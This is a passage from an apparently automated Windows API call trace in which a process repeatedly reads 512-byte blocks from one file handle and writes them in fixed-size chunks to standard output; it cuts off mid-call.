ReadFile (in: hFile=0x54, lpBuffer=0x1cedd8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdfc8, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesRead=0x1cdfc8*=0x200, lpOverlapped=0x0) returned 1 [0127.140] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.140] GetFileType (hFile=0x4c) returned 0x1 [0127.140] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.140] GetFileType (hFile=0x4c) returned 0x1 [0127.140] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.140] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.140] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.140] GetFileType (hFile=0x4c) returned 0x1 [0127.140] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.140] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee28*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.140] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.140] GetFileType (hFile=0x4c) returned 0x1 [0127.140] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.140] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee78*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.140] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.140] GetFileType (hFile=0x4c) returned 0x1 [0127.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.141] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceec8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1ceec8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.141] GetFileType (hFile=0x4c) returned 0x1 [0127.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.141] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef18*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.141] GetFileType (hFile=0x4c) returned 0x1 [0127.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.141] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef68*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.141] GetFileType (hFile=0x4c) returned 0x1 [0127.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.141] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefb8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cefb8*, lpNumberOfBytesWritten=0x1cdfbc*=0x20, lpOverlapped=0x0) returned 1 [0127.141] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.141] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdfa8 | out: lpNewFilePointer=0x0) returned 1 [0127.141] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.141] ReadFile (in: hFile=0x54, lpBuffer=0x1cedd8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdfc8, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesRead=0x1cdfc8*=0x200, lpOverlapped=0x0) returned 1 [0127.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.141] GetFileType (hFile=0x4c) returned 0x1 [0127.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.141] GetFileType (hFile=0x4c) returned 0x1 [0127.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.141] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.141] GetFileType (hFile=0x4c) returned 0x1 [0127.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.142] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee28*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.142] GetFileType (hFile=0x4c) returned 0x1 [0127.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.142] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee78*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.142] GetFileType (hFile=0x4c) returned 0x1 [0127.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.142] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceec8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1ceec8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.142] GetFileType (hFile=0x4c) returned 0x1 [0127.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.142] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef18*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.142] GetFileType (hFile=0x4c) returned 0x1 [0127.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.142] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef68*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.142] GetFileType (hFile=0x4c) returned 0x1 [0127.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.142] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefb8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cefb8*, lpNumberOfBytesWritten=0x1cdfbc*=0x20, lpOverlapped=0x0) returned 1 [0127.142] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.142] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdfa8 | out: lpNewFilePointer=0x0) returned 1 [0127.142] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.143] ReadFile (in: hFile=0x54, lpBuffer=0x1cedd8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdfc8, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesRead=0x1cdfc8*=0x200, lpOverlapped=0x0) returned 1 [0127.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.143] GetFileType (hFile=0x4c) returned 0x1 [0127.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.143] GetFileType (hFile=0x4c) returned 0x1 [0127.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.143] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.143] GetFileType (hFile=0x4c) returned 0x1 [0127.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.143] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee28*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.143] GetFileType (hFile=0x4c) returned 0x1 [0127.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.143] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee78*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.143] GetFileType (hFile=0x4c) returned 0x1 [0127.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.143] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceec8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1ceec8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.143] GetFileType (hFile=0x4c) returned 0x1 [0127.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.143] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef18*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.143] GetFileType (hFile=0x4c) returned 0x1 [0127.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.143] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef68*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.144] GetFileType (hFile=0x4c) returned 0x1 [0127.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.144] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefb8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cefb8*, lpNumberOfBytesWritten=0x1cdfbc*=0x20, lpOverlapped=0x0) returned 1 [0127.144] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.144] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdfa8 | out: lpNewFilePointer=0x0) returned 1 [0127.144] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.144] ReadFile (in: hFile=0x54, lpBuffer=0x1cedd8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdfc8, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesRead=0x1cdfc8*=0x200, lpOverlapped=0x0) returned 1 [0127.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.144] GetFileType (hFile=0x4c) returned 0x1 [0127.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.144] GetFileType (hFile=0x4c) returned 0x1 [0127.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.144] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.144] GetFileType (hFile=0x4c) returned 0x1 [0127.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.144] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee28*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.144] GetFileType (hFile=0x4c) returned 0x1 [0127.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.144] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee78*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.144] GetFileType (hFile=0x4c) returned 0x1 [0127.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.145] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceec8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1ceec8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.145] GetFileType (hFile=0x4c) returned 0x1 [0127.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.145] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef18*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.145] GetFileType (hFile=0x4c) returned 0x1 [0127.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.145] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef68*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.145] GetFileType (hFile=0x4c) returned 0x1 [0127.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.145] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefb8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cefb8*, lpNumberOfBytesWritten=0x1cdfbc*=0x20, lpOverlapped=0x0) returned 1 [0127.145] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.145] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdfa8 | out: lpNewFilePointer=0x0) returned 1 [0127.145] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.145] ReadFile (in: hFile=0x54, lpBuffer=0x1cedd8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdfc8, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesRead=0x1cdfc8*=0x200, lpOverlapped=0x0) returned 1 [0127.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.145] GetFileType (hFile=0x4c) returned 0x1 [0127.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.145] GetFileType (hFile=0x4c) returned 0x1 [0127.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.145] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.145] GetFileType (hFile=0x4c) returned 0x1 [0127.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.146] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee28*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.146] GetFileType (hFile=0x4c) returned 0x1 [0127.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.146] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee78*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.146] GetFileType (hFile=0x4c) returned 0x1 [0127.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.146] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceec8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1ceec8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.146] GetFileType (hFile=0x4c) returned 0x1 [0127.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.146] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef18*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.146] GetFileType (hFile=0x4c) returned 0x1 [0127.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.146] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef68*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.146] GetFileType (hFile=0x4c) returned 0x1 [0127.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.146] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefb8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cefb8*, lpNumberOfBytesWritten=0x1cdfbc*=0x20, lpOverlapped=0x0) returned 1 [0127.146] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.146] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdfa8 | out: lpNewFilePointer=0x0) returned 1 [0127.146] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.147] ReadFile (in: hFile=0x54, lpBuffer=0x1cedd8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdfc8, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesRead=0x1cdfc8*=0x200, lpOverlapped=0x0) returned 1 [0127.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.147] GetFileType (hFile=0x4c) returned 0x1 [0127.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.147] GetFileType (hFile=0x4c) returned 0x1 [0127.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.147] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.147] GetFileType (hFile=0x4c) returned 0x1 [0127.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.147] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee28*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.147] GetFileType (hFile=0x4c) returned 0x1 [0127.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.147] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee78*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.147] GetFileType (hFile=0x4c) returned 0x1 [0127.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.147] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceec8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1ceec8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.147] GetFileType (hFile=0x4c) returned 0x1 [0127.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.147] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef18*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.147] GetFileType (hFile=0x4c) returned 0x1 [0127.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.147] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef68*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.148] GetFileType (hFile=0x4c) returned 0x1 [0127.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.148] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefb8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cefb8*, lpNumberOfBytesWritten=0x1cdfbc*=0x20, lpOverlapped=0x0) returned 1 [0127.148] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.148] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdfa8 | out: lpNewFilePointer=0x0) returned 1 [0127.148] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.148] ReadFile (in: hFile=0x54, lpBuffer=0x1cedd8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdfc8, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesRead=0x1cdfc8*=0x200, lpOverlapped=0x0) returned 1 [0127.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.148] GetFileType (hFile=0x4c) returned 0x1 [0127.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.148] GetFileType (hFile=0x4c) returned 0x1 [0127.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.148] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.148] GetFileType (hFile=0x4c) returned 0x1 [0127.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.148] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee28*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.148] GetFileType (hFile=0x4c) returned 0x1 [0127.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.149] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee78*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.149] GetFileType (hFile=0x4c) returned 0x1 [0127.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.149] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceec8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1ceec8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.149] GetFileType (hFile=0x4c) returned 0x1 [0127.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.149] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef18*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.149] GetFileType (hFile=0x4c) returned 0x1 [0127.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.149] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef68*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.149] GetFileType (hFile=0x4c) returned 0x1 [0127.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.149] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefb8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cefb8*, lpNumberOfBytesWritten=0x1cdfbc*=0x20, lpOverlapped=0x0) returned 1 [0127.149] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.149] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdfa8 | out: lpNewFilePointer=0x0) returned 1 [0127.149] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.149] ReadFile (in: hFile=0x54, lpBuffer=0x1cedd8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdfc8, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesRead=0x1cdfc8*=0x200, lpOverlapped=0x0) returned 1 [0127.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.149] GetFileType (hFile=0x4c) returned 0x1 [0127.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.149] GetFileType (hFile=0x4c) returned 0x1 [0127.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.150] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) 